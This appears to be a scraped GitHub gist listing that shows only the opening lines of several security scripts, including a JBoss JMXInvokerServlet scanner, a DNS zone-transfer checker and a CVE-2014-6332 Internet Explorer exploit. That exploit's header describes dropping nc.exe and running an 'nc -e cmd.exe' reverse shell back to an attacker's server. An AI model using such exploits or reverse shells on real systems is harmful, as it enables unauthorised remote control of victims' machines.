This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding=utf-8 | |
# Jboss JMXInvokerServlet 批量探测脚本 | |
# usage: ./invoker_assassin.py ipfile.lst | |
# ipfile.lst 中保存要批量探测的IP列表,支持CIDR方式 | |
# 结果保存在result_vuls.lst中 | |
# By xk0n 2015.09.10 | |
import sys | |
from itertools import product |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding=utf-8 | |
# 批量测试域传送漏洞 | |
# usage: ./xfr_check.py domain.lst domain.lst is the file contain domain per line | |
# by xk0n 2015.09.11 | |
import sys | |
import time | |
import dns.resolver | |
import dns.zone |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# @Author : xk0n | |
# @Date : 2017-00-00 | |
# from __future__ import print_function,division,unicode_literals | |
import SocketServer | |
import struct | |
import datetime | |
import logging |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import random | |
import argparse | |
import sys | |
from io import BytesIO | |
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
PY2 = True if sys.version_info.major == 2 else False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM ruby:2.4.1-alpine | |
MAINTAINER Rapid7 | |
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" | |
ENV APP_HOME /usr/src/metasploit-framework/ | |
ENV MSF_USER msf | |
ENV NMAP_PRIVILEGED="" | |
WORKDIR $APP_HOME | |
COPY Gemfile* m* Rakefile $APP_HOME |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"flag" | |
"fmt" | |
"log" | |
"net/http" | |
"path/filepath" | |
) |